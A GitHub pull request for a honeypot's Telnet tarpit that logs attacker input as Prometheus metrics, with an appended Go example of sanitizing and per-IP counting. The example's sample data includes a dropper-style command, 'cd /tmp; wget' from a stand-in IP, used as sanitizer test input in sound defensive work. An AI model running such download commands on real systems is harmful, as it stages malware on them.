
feat: capture and log attacker input from Telnet sessions#15

Open
vinayaktyagi10 wants to merge 3 commits into honeynet:main from vinayaktyagi10:feat/telnet-payload-capture-clean

Conversation

@vinayaktyagi10

Summary

Adds real-time attacker input capture to the Telnet tarpit, logging
what attackers send during sessions as Prometheus metrics.

Changes

servers/telnet_pit.c

  • Add non-blocking read() after each successful IAC write
  • Sanitize captured input: replace non-printable bytes and IAC
    sequences (>126 or <32) with '.'
  • Emit Telnet action <ip> <data> metric via sendMetric on each read
  • Handle r==0 (client disconnected mid-session) with proper disconnect
    metric and cleanup

prometheus/main.go

  • Add telnet_pit_input CounterVec with labels ip and data
  • Handle action command in handleMetric switch statement
  • Guard against malformed/short metric lines with len(fields) check

Why

The Telnet pit previously discarded all data sent by attackers.
This change captures that data in real-time, enabling researchers
to observe attacker behavior and build datasets of credentials and
commands used in the wild.

Testing

Tested locally by connecting via nc and typing input. Confirmed
Telnet action <ip> <data> lines appear in server output per
keystroke. Graceful shutdown confirmed still working after changes.

- Add non-blocking read() after each IAC write in the queue loop
- Sanitize input: replace non-printable bytes and IAC sequences with '.'
- Emit 'Telnet action <ip> <data>' metric via sendMetric on each read
- Handle r==0 (client disconnected) with proper disconnect metric
- Data is logged immediately per read for real-time visibility
- Add telnetInput CounterVec with labels 'ip' and 'data'
- Handle 'action' command in handleMetric switch
- Guard against malformed metric lines with len(fields) check
Uday9909 added a commit to Uday9909/EventHorizon that referenced this pull request Mar 23, 2026
Add mqtt_pit_payload_captured Prometheus metric that records
attacker-supplied data from three MQTT packet types:

- CONNECT: client_id, username, protocol version (password never captured)
- PUBLISH: topic name and payload
- SUBSCRIBE: topic filter

Follows the same sendMetric() unixgram IPC pattern as PR honeynet#15.

Safety:
- Passwords skipped entirely, never passed to any metric
- Binary payloads sanitized to printable ASCII
- All fields truncated at 256 bytes
- Malformed packets handled without crash
- NULL guards on all capture functions

Also removes password from existing credentials metric emission.
Old code sent username and password. New code sends username only.

Adds uint16_t port to struct mqttClient for source port labeling.
@vinayaktyagi10
Author

Update: Removed data from metric labels to avoid unbounded
Prometheus cardinality. Arbitrary attacker input as a label creates
a new time series per unique string, which causes memory pressure
under real attack load. Raw input is still logged via printf for
visibility.
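Worked example, added here as editor's illustration and not code from the honeynet project or either PR author: it puts together the Changes list above (the sanitize rule of replacing bytes <32 or >126 with '.', the "Telnet action <ip> <data>" line handed to sendMetric, the len(fields) guard on the receiving side) and the cardinality fix from the follow-up comment. Assumptions: the metric line format is exactly "Telnet action <ip> <data>"; the 256-byte truncation is borrowed from the MQTT capture commit quoted above and is not something telnet_pit.c specifies; the InputCounter type is a stand-in for the telnet_pit_input CounterVec keyed by ip only, so the example needs no client_golang dependency; the sample reads and addresses are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
	"sync"
)

// maxDataLen caps how much of one read is kept. Assumption: 256 bytes, taken from
// the MQTT capture commit; telnet_pit.c sets no limit in the PR description.
const maxDataLen = 256

// sanitize applies the PR's rule: every byte outside printable ASCII (<32 or >126,
// which covers CR/LF and the Telnet IAC byte 0xFF) becomes '.'. Truncating
// afterwards stops one read from turning into an arbitrarily long log line.
func sanitize(raw []byte) string {
	out := make([]byte, 0, len(raw))
	for _, b := range raw {
		if b < 32 || b > 126 {
			out = append(out, '.')
		} else {
			out = append(out, b)
		}
	}
	if len(out) > maxDataLen {
		out = out[:maxDataLen]
	}
	return string(out)
}

// buildMetricLine is the sender side: the line the tarpit would pass to sendMetric.
// Sanitizing first guarantees the payload stays on one line.
func buildMetricLine(ip string, raw []byte) string {
	return fmt.Sprintf("Telnet action %s %s", ip, sanitize(raw))
}

// Action is one parsed metric line.
type Action struct {
	IP   string
	Data string
}

var errMalformed = errors.New("malformed metric line")

// parseAction is the receiver-side guard: fewer than four space-separated fields
// (or an empty payload) is rejected instead of being indexed out of range. SplitN
// keeps any spaces inside the attacker's input intact.
func parseAction(line string) (Action, error) {
	parts := strings.SplitN(strings.TrimRight(line, "\r\n"), " ", 4)
	if len(parts) < 4 || parts[0] != "Telnet" || parts[1] != "action" || parts[3] == "" {
		return Action{}, errMalformed
	}
	// Re-sanitize here too; the unixgram peer is trusted but the cost is nil.
	return Action{IP: parts[2], Data: sanitize([]byte(parts[3]))}, nil
}

// InputCounter stands in for the telnet_pit_input CounterVec. It is keyed by ip
// only: attacker-supplied data never becomes a label, so the number of series is
// bounded by the number of source addresses, not by the distinct strings typed.
type InputCounter struct {
	mu   sync.Mutex
	byIP map[string]int
}

func NewInputCounter() *InputCounter { return &InputCounter{byIP: map[string]int{}} }

// HandleMetric does what the "action" case of handleMetric would: validate the
// line, bump the per-ip counter, and return the sanitized payload as a log line,
// which is where the raw content goes instead of into a label.
func (c *InputCounter) HandleMetric(line string) (string, error) {
	a, err := parseAction(line)
	if err != nil {
		return "", err
	}
	c.mu.Lock()
	c.byIP[a.IP]++
	c.mu.Unlock()
	return fmt.Sprintf("telnet input from %s: %q", a.IP, a.Data), nil
}

// Count is the per-ip total; Series is how many label sets exist.
func (c *InputCounter) Count(ip string) int { c.mu.Lock(); defer c.mu.Unlock(); return c.byIP[ip] }
func (c *InputCounter) Series() int        { c.mu.Lock(); defer c.mu.Unlock(); return len(c.byIP) }

func main() {
	// Constructed sample reads, not captured traffic; addresses are documentation ranges.
	reads := []struct {
		ip  string
		raw []byte
	}{
		{"203.0.113.7", []byte("root\r\n")},
		{"203.0.113.7", []byte{0xFF, 0xFD, 0x01}}, // IAC DO ECHO: every byte becomes '.'
		{"198.51.100.9", []byte("cd /tmp; wget http://203.0.113.200/x\r\n")},
	}
	c := NewInputCounter()
	for _, r := range reads {
		if logLine, err := c.HandleMetric(buildMetricLine(r.ip, r.raw)); err != nil {
			fmt.Println("dropped:", err)
		} else {
			fmt.Println(logLine)
		}
	}
	_, err := c.HandleMetric("Telnet action 203.0.113.7") // short line: rejected, not indexed
	fmt.Println("short line:", err, "| series:", c.Series())
}
```

Feeding a thousand different inputs from one address leaves exactly one series in the counter, which is the property the follow-up comment is after; the content of those inputs is still available, just in the log line rather than in a label.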

